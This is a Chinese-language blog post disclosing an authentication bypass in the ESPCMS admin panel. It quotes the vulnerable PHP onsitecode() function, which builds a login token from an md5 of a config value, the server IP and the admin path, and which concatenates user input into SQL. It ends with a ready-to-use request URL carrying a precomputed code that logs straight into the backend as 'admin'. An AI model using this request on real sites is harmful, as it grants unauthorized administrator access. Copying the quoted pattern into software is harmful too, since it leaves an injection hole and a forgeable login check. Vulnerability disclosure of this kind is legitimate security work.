ESPCMS 后台登陆绕过bug

时隔好久,童鞋相继发过这个CMS漏洞,今天大体看了下,问题还有,官方还是一直在修复漏洞。

问题出在后台文件adminsoft\control\adminuser.php文件

代码问题出在函数onsitecode()
[php]
function onsitecode() {
parent::start_template();
$db_table = db_prefix . "admin_member";
$linkURL = $_SERVER['HTTP_REFERER'];
$siteid = $this->fun->accept('siteid', 'R');
$code = $this->fun->accept('code', 'R');
$adminid = $this->fun->accept('adminid', 'R');
$siteip = $this->fun->real_server_ip();
//echo $adminid;
if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) {
exit();
}
$codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);

if ($code == $codelist) {
$db_where = "username='$adminid' AND isclass=1 AND isremote=1";
$rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where);
if (!$rsMember) {
exit('ESPCMS:Parameter error!');
} else {

$ipadd = $this->fun->ip($_SERVER['REMOTE_ADDR']);
$date = time();
$db_set = "intime=$date,ipadd=$ipadd,hit=hit+1";
$this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);

$db_table = db_prefix . 'admin_powergroup';
$db_where = 'id=' . $rsMember['powergroup'];
$rsPower = $this->db->fetch_first('SELECT powername,powerlist FROM ' . $db_table . ' WHERE ' . $db_where);
if ($rsPower['powerlist'] != 'all') {

$rsPower_array = explode('|', $rsPower['powerlist']);
$rsPower_array = is_array($rsPower_array) ? $this->fun->exp_array($rsPower_array) : $rsPower_array;

$sysArray = $this->get_powermenulist('all');
$sys_newsArray = array();
foreach ($sysArray as $key => $value) {
$sys_newsArray[] = $value['loadfun'];
}
$sys_newsArray = $this->fun->exp_array($sys_newsArray);

$diff_array = array_diff($sys_newsArray, $rsPower_array);
$rsPower['powerlist'] = implode('|', $diff_array);
}

$this->fun->setcookie("esp_powerlist", $this->fun->eccode($rsPower['powerlist'], 'ENCODE', db_pscode));
$this->fun->setcookie('ecisp_admininfo', $this->fun->eccode("$rsMember[id]|$rsMember[username]|$rsMember[password]|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember[powergroup] . '|' . $rsMember[inputclassid] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode));
$this->writelog($this->lng['adminuser_login_log_action'], $this->lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']);
header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
exit('true');
}
}
exit();
}[/php]
只要$code == $codelist就通过验证,那么我们可以自己构造,主要就是
$codelist = md5($this->CON['sitecoedb'] . ‘_’ . $siteip . ‘_’ . adminfile);
测试代码如下
index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea
直接访问登录后台。

发表评论